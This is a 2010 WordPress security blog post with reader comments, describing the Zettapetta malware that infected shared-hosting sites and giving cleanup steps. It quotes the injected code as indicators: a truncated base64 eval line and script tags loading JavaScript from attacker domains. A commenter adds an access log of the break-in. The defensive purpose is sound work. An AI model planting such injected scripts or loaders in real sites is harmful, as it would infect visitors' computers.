Early this morning, we received reports that WordPress blogs were hacked on Linux shared-hosting at DreamHost, as well as other hosting companies. This is dangerous scareware which tries to install a virus on your visitor's computer.
WordPress, Zencart and other php-based platforms were hit. Our earliest hacked site report is of 5/6/2010 @ 9:17am.
This malware was just detected and is not showing up on website malware scanners yet. We have notified sucuri.net of this latest infection so that they can immediately update their malware detections systems.
In no way am I bashing Network Solutions as a hosting company, but I had to share this video with you showing someone breaking into sites on their servers. This is why you need to take your website security so seriously.
If you are hosting your WordPress blog at DreamHost or on another hosting company, please check your websites now to see if it has been infected.
Warning: Do not try to open your website unless you have an up-to-date anti-virus program, your computer is virus free and you're on a secured network!
Here's some of Zettapetta's behavior:
- Your website is redirected to:http://www1.firesavez5.com/?p=p52dcWpkbmmHjsbIo216h3de0KCf........ or
http://www1.firesavez6.com/?p=p52dcWpkbG6HjsbIo... - This redirect page is a blank page. The source code contains the following:
<h1>404 Not Found</h1>The page that you have requested could not be found. - All of your .php files on your WordPress contain the following malicious code...<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z.....
- Located in the source code near the bottom of all .php files is the following script:<script src="http://zettapetta.com/js.php"></script> and <script src="http://www.indesignstudioinfo.com/ls.php"> .
- Your antivirus program blocks the installation of the threat: www.firesavez5.com or a www.firesaver6.com installer.
How to fix your hacked WordPress site infected with this malware... <<< Before you try this, please read the update below for a quick fix!!!
- Immediately remove your index.php file from the root of your WordPress.
- Add a temporary index.html file to the root of your website that states your site is down for maintenance. (There's no reason to say your sites infected and scare people that haven't been infected). If you don't know how to make your own, you can use our index maintenance page on your own site. Just unzip the file, upload it to your server and then rename it to index.html.
- Go into your "File Manager" or FTP and find out what date and time your site's been hacked. You can tell by looking at your php files. They will most likely all have the same date and time. (To help spread awareness, please leave a comment below or email us this information so we can help track and spread security awareness to our readers.
- Make sure you have a backup of your website, you will need it handy to reinstall your website.
- Open your wp-content/plugins folder on your server and write down the names of all your plugins you have installed on your site.
- Make sure you have a backup of all your images and media. This is usually located in wp-content/uploads. You will need them to put your site back to normal.
- Delete your entire WordPress site from your server. If you have multiple sites on the same hosting account, you will have to do the same with them too! Don't just clean one. It could regenerate to the sites you've fixed.
- Go to http://wordpress.org and download a fresh copy of the latest version of WordPress.
- Unzip the download and unload it to your website via file manager or FTP. If you have SFTP or FTPES capabilities, please use this method. It encrypts all your files so bad guys can't read them.
- Upload your backed up copy of wp-config.php to the root of your WordPress installation. This is the file that connects to your database so all your posts, pages, settings, etc. work again.
- Upload your images and/or media back on the server. This is usually contained in your backed up copy of "wp-content/uploads," unless you chose to house your media in another folder. It contains all the images that you've added to your posts from within your wp-admin. If you don't have a backup of this directory, then you will have to re-upload all your images back to your posts and pages. Yes, I know... nightmare!
- Upload your backed up copy of your theme inside of wp-content/theme directory.
- Get your list of plugins you wrote down and go to http://wordpress.org and download them fresh to your computer and upload them back up to your website. Note: you may have to reactivate or update your plugin settings, but it sure beats losing everything.
- Try logging into your WordPress wp-admin section to see if everything looks okay.
- Visit your home page and try clicking some links to see if they work. If you notice that you get 404 errors when opening a post or page, then go to your wp-admin and update your permalinks. Here's how... Click on Settings > Permalinks > Save Changes. Whew, that was easy. Now go check to see if your links work.
- Go to your server and make sure you have the correct permissions set. All directories/folders should be a maximum of 755. All files, including your php files, images, html, etc, need to be set at a maximum of 644. Note: Never set any directory, including a recommendation from a plugin, to 777.
- Change all your passwords to strong ones and don't use the same one!
- If you need help fixing your site, we can remove the malware and restore your WordPress for you. Contact us for more details.
Now that you've recovered your website. Be sure that you're using the latest version of WordPress. And if you'd like detailed instructions on how to upgrade your WordPress installation, be sure to click here.
We need your help...
This new http://zettapetta.com/js.php malware was just discovered this morning, thanks to a report from Thomas. Please help spread awareness and come together as a community to have safe websites and browsing. Be sure to Tweet this post and add to your Facebook. If you find any information on this new issue, please leave a comment below so we can all help each other.
UPDATE 5/7/2010 at 12:15pm: David Dede of Sucuri.net has written some information about this attack as well as decoding the script.
Be first to know if anything has changed on your website or you have any malicious malware, get the Web Monitoring Service from Sucuri.net. You can sign-up with our discount affiliate link for only $7.99/month, click here.
UPDATE 5/7/2010 at 4:00pm: If you're site is hosted at Go Daddy and you think it may have been compromised, please contact the Go Daddy Security Team here...
http://www.godaddy.com/securityissue
QUICK FIX - UPDATE 5/7/2010 at 5:00 pm: This latest attack seems to be a quick fix, according to David Dede. He has written instructions to fix your hacked WordPress site with the zettapetta. CLICK HERE.
P.S. Thanks David! You Rock!
Go Daddy also responds to this attack - Read our latest post here.
Securely yours,
Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter
Join us on May 19th for a WordPress Security Teleseminar!
You can still listen our WordPress Security Teleseminar Replay with special guest, Scott from Go Daddy recorded on May 5, 2010. And sign up for our May 19, 2010 at 9pm EST WordPress Security Teleseminar. Participate live from anywhere in the world. Click Here To Register Now!
About Regina Smola
Get your FREE Report,
My WordPress site at *GoDaddy* was hacked with this header injection today: timestamp May 7 00:53 MST
Hi Erik,
Thanks for reporting this. I have sent a message to Godaddy with your information. I appreciate you spreading awareness. If you need help fixing your site, just let us know.
If you think your site's been compromised and you host with GoDaddy.com, you can submit your information to our security team for review. The contact form can be found here: http://fwd4.me/Mrd
Alicia
I have just updated this post with a new video to watch someone breaking into a hosting server. Also, be sure to check for UPDATES right above my signature of anything new we find.
Regina, I don't understand. The video you posted above clearly shows someone hacking into **any shared hosting account** at Network Solutions **with no username or password needed**...
If this is true, then what difference does it make what I try to do to protect my site? I was hacked for the *third* time tonight and I'm certain I've taken every precaution and best practice several times over, spending days to do so, but it all won't matter a hill of beans if someone can just walk right in there due to a GoDaddy/NS/etc shared hosting vulnerability!
Right??
I just checked all the hacked websites we've fixed over the last month and none are attacked. This could possibly be a brute force attack. You should really use strong passwords. Generate minimum of 14 characters and use different ones ASAP!
This morning one of my sites was hacked again. Same way as other WP sites.
What a pain.
Please send us an e-mail with your URL so we can do a manual scan and check the script on there.
David,
I cannot afford to keep my site hacked.
I replaced hacked files with backed up files.
I'm glad you had a backup.
As I also host a forum I didn't want to remove everything and install it again, so what I did was removing the PHP line in question with Notepad++ from all the files I just backupped, and uploaded everything to the server, overwriting each and every file.
I hope that'll do the trick as well?
Ramses,
I bet that took awhile. Glad you got rid of the code.
Be sure to check for any files that may have been added that shouldn't be there. Sometimes the malicious hackers add their own files to your site.
Well, it were near to 6000 files. Luckily Notepad++ has an option to replace code in all files within a directory, so it was really just copying the code, tell Notepad++ to replace it with nothing, and let it run for some minutes.
I'll have to take the time to see what has been added in the form of a file, which will be brutal considering I have over 6000 files up.
I have 12 different wordpress sites installed on DreamHost. None of mine are hacked. Makes me curious about what the issue is. Thanks for the information about it though.
Travis, I'm glad you're sites are safe. I am noticing alot of these infected websites have very weak passwords. Hmmm, could be a brute force attack.
Per advice given by a colleague whose blog was also hacked this morning, advice given by godaddy was also to change all passwords to something hard to breach, as you mention above. This information is a god-send!
Regina,
Not really.
I'm using a 11 characker password.
Upper case, lower case, numbers, special characters. And of course it's not a dictionary word.
Result?
Hacked this morning.
Nope, it's not a brute force attack. That's for sure.
Yeah... I see the 1st comment mentions GoDaddy.
Have 2 sites both hosted there. 8:35 AM MST this morning. It hit one of them (HTML and minimal PHP)... the other one seemed okay. I have to go back and look ... the other one is just HTML if memory serves.
Hi Joe,
Sorry to hear about your site getting hacked. Make sure you let Go Daddy's Security Team know right away at http://www.godaddy.com/securityissue
My wordpress blog hosted with godaddy was hacked at 12:24AM this morning, May 7th. Thank you SO much for the steps above to fix it. Every single php file on the server has some nasty code on it. It appears as if none of the other files (css, js, html, etc), were touched. Can't tell yet if there were other files added. Doing a clean sweep as recommended.
I forgot to mention that I am NOT on the latest version of WordPress . I'm running a version that is a year or so old. So it's not just the latest upgrades that are affected. WordPress really might want to look into this. And quickly.
There's a quick fix to remove the malware from your WordPress website, thanks to David Dede. You can find it here. Also, just statment just released from Go Daddy helping their customers - click here.
That quick fix from David is *awesome*. Unfortunately I had already done a manual removal of the code + overriding bad files and had just finished before I saw this. The really weird thing is, after all was said and done (took me 8 hours to fix today), I checked my permission settings on all folders and files that might have been insecure (index.php, .htaccess, .wp-config, etc, etc) and they were all rock-solid- at the highest, most secure settings, *before* this happened. This leads me to think that maybe it's an FTP issue, or somehow they are getting in through the hosts? Really wish I knew how to protect myself from this happening again, given how many people seem to have repeat occurences. Off to change my passwords!
Thanks you Regina and David Dede. you help me to fix the problem finally.
My site is also hosted at godaddy. and you help you solve this problem not godaddy, they not good at it.
Another WP site hacked this morning. May 08, 2010.
I was checking the access.log for the modification date of the hacked .php files. An example:
All files were last modified on March 30th at 12:06:
-rwxr-x--- 1 1112 1112 577 Mar 30 12:06 wp-rss.php
-rwxr-x--- 1 1112 1112 579 Mar 30 12:06 wp-rss2.php
-rwxr-x--- 1 1112 1112 11269 Mar 30 12:06 wp-settings.php
-rwxr-x--- 1 1112 1112 3970 Mar 30 12:06 wp-trackback.php
-rwxr-x--- 1 1112 1112 58404 Mar 30 12:06 xmlrpc.php
Let's have a look at the access.log:
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "GET /wp-login.php HTTP/1.1" 200 1891 "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "POST /wp-login.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:44 +0200] "GET /wp-admin/profile.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "POST /wp-login.php HTTP/1.1" 302 - "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "GET /wp-admin/profile.php HTTP/1.1" 200 4922 "http://www.1112/wp-login.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:45 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5683 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:46 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5833 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:46 +0200] "GET /xmlrpc.php HTTP/1.1" 200 60814 "http://www.1112/wp-admin//options-permalink.php" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 9
wimax-client.yota.ru 1112 - - [30/Mar/2010:12:06:56 +0200] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 5765 "http://www.1112/" "Mozilla/4.0 (compatible; MSIE 5.00; Windows XP Service Pack 2)" 0
The above information is true for all of my hacked vhosts.
HTH
Thomas
I've tried the quick fix to solve the matter however it doesn't appear to work for me, I've removed all files on my site and re-uploaded refresh, patching my site as I don't have any backups however it there.
Could this be because someone else infected on the same server as me hasn't resolved it?
E-mailed my host but I just got a message stating this and that was out of date but my website was using the latest wordpress and mybb. :S
My WP blog (Bluehost) was hacked at 4:25 pm on May 6th. The blog itself looks fine but the admin site is messed up. I knew something weird was going on because I was getting fake Windows Security screens that said my computer was infected and it looked like it was doing a scan. I would immediately try to close the page and would get a "are you sure you want to navigate away from this page" box and the scan would appear to be continuing in the time that it took me to continue to try to shut it down. The fake pages would appear when I visited my blog, my blog admin page, and my own website.
The quick fix mentioned above isn't working for me.
Oh, and it's nice to see these hosting sites offering support. Bluehost's response? They sent an email this morning saying they had suspended my account due to "violation of terms of service".
Nice move Bluehost.
I was hit with this also (on dreamhost). But for me, it wasn't JUST wordpress files..it was pretty much all my php files for all my subdomains.
Also, under my main domain it added a ".files" folder that held a ton of html articles.
We had a wordpress blog linked into our joomla installation, it inserted the following code in index.php in the joomla directory. I deleted this and any file created in the last 2 days (there was wp-d23098sdoijasdfoiwj09uwef.php created yesterday) and when all this was done, the site is working. But now wordpress admin dashboard is corrupted. At least malware is gone. See more info on our other company blog:
http://eliteeservices.blogspot.com/2010/05/godaddy-network-solutions-dreamhost.html
Hi Joe,
Try cleaning your browser cookies and cache and it should look normal again.
Couldn't be written any better. Reading this entry reminds me of my dated abide cohort! He always kept talking about this. I forwarded this article to him. Pretty unshakable. He will have a good read. Thanks for sharing!
I believe my site has been compromised. Can you help me fix this?
http://www.wpsecuritylock.com/services/wordpress-malware-removal-and-restoration/